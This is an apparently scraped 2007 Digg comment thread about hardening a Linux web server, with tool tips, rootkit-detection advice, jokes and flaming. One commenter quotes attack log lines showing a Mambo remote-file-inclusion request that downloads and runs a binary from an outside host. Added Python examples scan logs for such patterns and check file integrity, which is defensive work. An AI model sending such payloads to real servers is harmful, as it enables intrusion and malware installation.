36 Comments
- bobonot, on 10/12/2007, -0/+21 Sharks with Friggin' lasers!
- xero9, on 10/12/2007, -0/+17 And no network or power cable attached of course :)
- V1ncent, on 10/12/2007, -0/+17 Of course the most secure system is wrapped in 12 layers of protective concrete and is sitting on the ocean floor guarded by sharks.
- jinexile, on 10/12/2007, -0/+17 k I tried this and my web server is still not filled with gold.
- monahmat, on 10/12/2007, -0/+8 Great article even if you have no idea how to start cracking down on system security. Go through this and your LAMP server should be safe from almost anything.
- chinkmasterrice, on 10/12/2007, -0/+6 Excellent article. People don't realize that a mismanaged Linux box is as bad as, say, Windows. Digg.
- MajorHertz, on 10/12/2007, -2/+7 Do they have spell check and the like there, too?
- Ingold, on 10/12/2007, -0/+4 On the plus side, it's a really good article.. if everyone did this when they set up web servers I gotta say the web would be just that little bit better.
- ohhhL3ThaL, on 10/12/2007, -2/+6 404 Spellcheck not found
- v3xt0r, on 10/12/2007, -0/+4 chkrootkit, interesting. The rest is common sense imo. Good read either way.
- MisterCookie, on 10/12/2007, -0/+3 Yep. One of the problems with Windows is that even if you took away the coding errors, way too many services are enabled by default, such as UPnP or NetBIOS.
- MisterCookie, on 10/12/2007, -0/+3 I'm really surprised he didn't mention DenyHosts. Excellent program that prevents brute force SSH logins.
http://denyhosts.sourceforge.net/
- drag, on 10/12/2007, -0/+2 Anti-virus/anti-malware/anti-rootkit items like chkrootkit or rootkit hunter are, unfortunately, pretty useless when it comes to security.
There are two reasons:
A. Because the rootkit writers have access to those tools also. So all they have to do to defeat them is set up a Linux server and run those programs. If they are detected, then they simply have to modify how their program works so that they aren't detected anymore. It's almost trivially easy to defeat them with old fashioned 'conventional' rootkits.
B. Also kernel module rootkits are popular nowadays anyway. These are kernel modules that modify how a kernel behaves in order to mask the rootkit itself. These are nearly impossible to detect.
BTW since Windows 2000 started having acceptable security, kernel driver level rootkits for Windows have become popular.
The only really effective way to detect a rootkit is to set up a program like Tripwire.
Tripwire is a program that you use to make checksums of all the files on your computer, then later you can run it to check the checksums. You have to store the checksum output on a secure computer or secure read-only medium (like a CD-ROM disk). Also Tripwire is only useful if you run it from a different operating system than the one you're currently running (like say booted up from a Knoppix CD-ROM).. This is because it can be defeated by false reports created by a kernel module level rootkit.
This is better than the checksumming offered by RPMs or system level items because those things can be perverted and used against you by the attacker also.
The other way to detect a rooted machine would be to use an intrusion detection program (IDS for short) like Snort. These IDSs are run by machines that can sniff the network. Often they are completely passive with network taps so that they can read network data, but are inaccessible themselves. Switched networks pose a problem for these things and often you need to have a special passive tap into your switch or just rely on the IDS to detect traffic going in and out of your router/firewall. These things watch traffic patterns and can be configured to detect any sort of network traffic that isn't supposed to happen, then log and probably notify you of it.
Needless to say, to get the most effectiveness out of things like Tripwire and Snort it can get pretty expensive and involved.
However even though something like Tripwire and an IDS can detect LKM rootkits there are no reliable ways to permanently remove a rootkit. You don't know what all the hacker has done to your system.. even if you detect and remove one program there may be others.
The only way to be sure that a machine is safe after having gotten rooted is to format and reinstall from scratch. If you're 100% sure when the attack took place then you can probably get away with restoring from backup..
Anything else is full of false assurances and is not trustworthy.
Windows is the same thing also. If somebody has gained administrative access (rooted your machine) the only safe thing to do is to format and reinstall.
Needless to say you want to keep your machines secure from attack FIRST rather than worry about detection items like anti-virus or chkrootkit or rootkit hunter.
Like they say: "An ounce of prevention is worth more than a pound of cure"
or.. so I don't get accused of being too United States centric..
"2.83495231 decagrams of prevention is worth more than 4.5359237 hectograms of cure"
- gigamike, on 10/12/2007, -0/+2 Great article and though well versed in security, I picked up some new things. Bad Digg title though, heh. Digg!
- dwwatk01, on 10/12/2007, -1/+3 Wow...take a deeep breath and step away from the computer.
Psycho.
- micro506, on 10/12/2007, -0/+2 But will this keep that pesky Oddjob out?
- jwestbrook, on 10/12/2007, -0/+2 digg
article missed 3 programs I like to include
Rootkit Hunter, PortSentry, and DenyHosts
- inactive, on 10/12/2007, -0/+1 it's not a BAD tut, and if it stops just one more spam-sending zombie I'm glad for it. Fort Knox? Hardly.
if you want a really secure webserver I have 2 words for you "READONLY FILESYSTEM"
- Ingold, on 10/12/2007, -2/+3 Agh!!! My eyes hurt..
- sholdowa, on 10/12/2007, -0/+1 The other thing that's missing is monitoring software - something that looks for any change in the normal running of the server. I use mrtg, but I'm an old g*t. I'm sure there're alternatives that are simpler to configure.
- yourabi, on 10/12/2007, -0/+1 MisterCookie et al. I don't really feel DenyHosts is all that helpful. A properly configured SSH server with an "AllowUsers" directive, and possibly listening on another port, is good enough (IMHO).
There have been several other articles on securing SSH specifically (in Linux Journal and elsewhere) and so I didn't feel the need to go to great depths securing SSH. That's common in articles. What I did find missing was attention to application level threats.
The read-only filesystem is a good idea -- but not practical. There is always this line of security vs usability -- I think RO FSs increase security for sure -- but at what cost to productivity (having to remount) every time you want to change something -- and what if the server is rooted anyway? Then it's just a big pain.
Cool!
- bwoodruff, on 10/12/2007, -0/+1 Very nice.
dugg
- bsoric, on 10/12/2007, -2/+3 I'm NOT SURE exactly what POINT YOU are trying to get ACROSS, there's no FORT KNOX in AUSTRALIA but you don't see me FLYING off THE HANDLE about AMERICANS and their ETHNOCENTRIC WAYS. "FORT KNOX" has BECOME one of THOSE THINGS that PEOPLE say when THEY MEAN secure. YOUR post HAS NO MEANING. IT SEEMS to BE A few unrelated SENTENCES with the OCCASIONAL word in CAPITALS.
Also, you made at least 14 spelling mistakes.
Did you actually read the article or did you just see "Linux" and "Fort Knox" in the title? I see you joined yesterday (maybe today in the rest of the world) so I assume you came for the videos, and managed to get lost and end up in the Technology Section. So I'll see you on your way, go back to the Videos section and check out some ub3r kewl article on finger drumming.
- Gryffydd, on 10/12/2007, -3/+4 Fort Knocks is Fort Knocks wherever you're from. It's a metaphor...get over it.
- incubuz, on 10/12/2007, -0/+1 Oops, pasted wrong line. (or it got broken)
Here is another.
83.19.xxx.xxx - - [07/Jun/2006:19:44:18 +0200] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid
]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.XXX.XXX/cmd.gif?
&cmd=cd%20/tmp;
wget%2072.18.XXX.XXX/lnikon;chmod%20744%20lnikon;
./lnikon;echo%20YYY;echo| HTTP/1.1" 404 293 "-"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
- incubuz, on 10/12/2007, -0/+1 Disable the ability of the httpd / apache user to run wget.
I have seen many attempted automated attacks trying to use wget.
200.14.XXX.XXX - - [04/Jun/2006:15:01:30 +0200] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.XXX.XXX/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 287
groupadd wget
chown root:wget /usr/bin/wget
chmod 750 /usr/bin/wget
- chieffy, on 10/12/2007, -0/+1 Isn't that four words?
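An added detection example, not incubuz's code and not part of the original thread, that runs the two heuristics his log lines suggest over constructed Apache access-log entries: a remote URL injected into a query parameter (remote file inclusion) and a download-and-run shell chain in the request. The client and payload addresses are documentation-range placeholders, not real hosts.

```python
import re
from urllib.parse import unquote

# Apache "combined" access-log prefix: client, ident, user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)
# Heuristics modelled on the requests incubuz quoted: a remote URL fed into a
# configuration variable (remote file inclusion) and a download-and-run shell chain.
# Both will also flag some legitimate traffic (e.g. a redirect parameter carrying a URL),
# so treat hits as leads, not verdicts.
RFI_RE = re.compile(r'[?&][^=&]*=https?://', re.IGNORECASE)
CMD_RE = re.compile(r'\b(?:wget|curl|chmod)\s|/tmp;|;\./', re.IGNORECASE)

# Constructed sample entries using documentation IP ranges; not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Jun/2006:15:01:30 +0200] "GET /index.php?option=com_content&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [04/Jun/2006:15:02:11 +0200] "GET /index2.php?option=com_content&mosConfig_absolute_path=http://192.0.2.10/cmd.gif?&cmd=cd%20/tmp;wget%20192.0.2.10/lnikon;chmod%20744%20lnikon;./lnikon HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '203.0.113.9 - - [04/Jun/2006:15:02:12 +0200] "GET /mambo/index2.php?GLOBALS=&mosConfig_absolute_path=http://192.0.2.10/cmd.gif? HTTP/1.1" 200 1203 "-" "Mozilla/4.0"',
]

def classify(line):
    """Return the reasons a request looks like an RFI/download attempt ([] when it looks benign)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable line"]
    target = unquote(m.group("target"))  # undo %20 etc. before matching
    reasons = []
    if RFI_RE.search(target):
        reasons.append("remote URL in a query parameter")
    if CMD_RE.search(target):
        reasons.append("shell command chain in query string")
    return reasons

def scan(lines):
    """Return (client ip, status, reasons) for each suspicious entry.
    A 200 on such a request deserves a closer look than the 404s incubuz saw."""
    hits = []
    for line in lines:
        reasons = classify(line)
        if reasons:
            m = LOG_RE.match(line)
            hits.append((m.group("ip") if m else "?", m.group("status") if m else "?", reasons))
    return hits

if __name__ == "__main__":
    for ip, status, reasons in scan(SAMPLE_LOG):
        print(ip, status, "; ".join(reasons))
```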
- inactive, on 10/12/2007, -0/+1 maybe :|
- ngfkjiohodns, on 10/12/2007, -1/+1 I got into Fort Knox... Not saying much.
- inactive, on 10/12/2007, -0/+0 @drag,
Do you know what algorithm tripwire uses to generate its checksums? I know a while ago that it used md5, but I haven't used it since they broke md5. Are they onto a different algorithm now, or can you choose a different one?
- Gryffydd, on 10/12/2007, -1/+1 I just realized I picked the one and only misspelling of Fort Knox that he *didn't* use in his post. Oops. I meant to say "Fort Nox is Fort Kynox wherever you're from."
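An added file-integrity example in the spirit of drag's Tripwire description and inactive's question about the hash algorithm; it is not Tripwire's own code. It takes a baseline of per-file digests (SHA-256 by default, with the algorithm selectable), serializes it as JSON meant to live on read-only or off-host storage, and reports added, removed and modified files on a later scan; as drag notes, such a check is only trustworthy when run from clean boot media, because a kernel-level rootkit on the live system can lie to it.

```python
import hashlib
import json
import tempfile
from pathlib import Path

def hash_file(path, algorithm="sha256"):
    """Digest a file in chunks. The algorithm is a parameter, so md5 never has to be used."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def take_baseline(root, algorithm="sha256"):
    """Map every regular file under root to its digest and permission bits,
    so a chmod on a system binary shows up as well as a content change."""
    files = {}
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and not p.is_symlink():
            files[p.relative_to(root).as_posix()] = {
                "digest": hash_file(p, algorithm),
                "mode": oct(p.stat().st_mode & 0o7777),
            }
    return {"algorithm": algorithm, "files": files}

def compare(baseline, current):
    """Return added, removed and modified paths between a stored baseline and a fresh scan."""
    old, new = baseline["files"], current["files"]
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }

def demo():
    """Constructed scenario: baseline a tiny tree, then replace one file and drop in a new one."""
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / "bin").mkdir()
        (Path(root) / "bin" / "ls").write_bytes(b"original ls")
        (Path(root) / "etc.conf").write_text("PermitRootLogin no\n")
        # In real use the serialized baseline belongs on read-only or off-host storage,
        # not on the machine being monitored.
        stored = json.dumps(take_baseline(root))
        (Path(root) / "bin" / "ls").write_bytes(b"trojaned ls")        # same size, new content
        (Path(root) / "bin" / "lnikon").write_bytes(b"dropped binary")  # new file appears
        return compare(json.loads(stored), take_baseline(root))

if __name__ == "__main__":
    print(demo())
```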
- Splitt3rxx, on 10/12/2007, -1/+1 how the ***** do you turn a computer into Fort Knox? damn, I guess those Linux devs can do anything.
- drag, on 10/12/2007, -0/+0 If you want to be a person with "moderate to advanced understanding of compilers and programming architecture" there are lots of good papers on things like Stack Smash Protection and such items.
OpenBSD folks are probably going to be the foremost on things like this that don't require special proprietary stuff or charge you money for information and such things, and are stuff you can implement yourself.
http://www.bytelabs.org/papers.html
Check out the paper titled "Integration of Security Measures and Techniques in an Operating System (considering OpenBSD as an example)"
For Linux and GCC, Red Hat put a lot of work into rewriting ProPolice SSP (developed originally out of IBM's Japan branch) and getting it into the GCC release. I believe it's in GCC 4.1.
Also introduced during the lifetime of the 2.6.x kernel release have been things like heap protection and support for the 'no execute' bit and such.
An example of this being used to protect a vulnerable program is outlined in this Debian-Administration.org article..
http://www.debian-administration.org/articles/408
And of course Wikipedia has a good article on it.
http://en.wikipedia.org/wiki/StackGuard
Other things for Linux (like he mentioned):
grsecurity http://www.grsecurity.net/
AppArmor (from Novell) http://www.novell.com/apparmor
SELinux (from the NSA (United States Government) and made workable by Red Hat for their Enterprise Linux and Fedora Core stuff).
All sorts of fun stuff.
These sorts of things are normally more at the distribution/developer level and not really something an administrator can implement themselves.
- ali3n, on 10/12/2007, -0/+0
>by MisterCookie
>
>I'm really surprised he didn't mention Denyhosts. Excellent program that prevents brute force SSH logins.
>http://denyhosts.sourceforge.net/
Denyhosts has definitely helped out our production servers by keeping the load averages down by blocking abusive ssh denial of service attacks. With some of the hardening mentioned in the article applied alongside Hardened Gentoo Linux a server could withstand a lot of abusive exploit attacks. By using a system which compiles binaries as position independent, every binary's memory execution insertion address is randomized. While this can be something more suited to administrators with a moderate to advanced understanding of compilers and programming architecture, when used alongside the grsecurity framework execution of a binary uses a different hexadecimal memory address which enforces a policy akin to winning the lottery for any malicious cracker. Our production 64-bit and 32-bit servers have all been using Hardened Gentoo for years and to date we have never experienced a system compromise. http://hardened.gentoo.org
- chinkmasterrice, on 10/12/2007, -2/+0 Shhh, quiet now, you're done.
- inactive, on 10/12/2007, -28/+0 FORT KYNOX? r u KIDDING ME?????? I am ffom BANGLADESH and we dont ehven have a FORT NOX here so that is a very ETHNOCENTRIC response to your typical ELITIST LINUX USER mentality. I am the writer of hte LINUX in bangaldesh and we do a lot more serving than you do in AMERICA! we have call centers, rapid responses ecneters, imploye traineing centers, and the software delveoper centers - ALL LINUX BASED. and we are to tell you, that we are the ones who are makign the LINUX happen in the world, not your FORT KNOXS!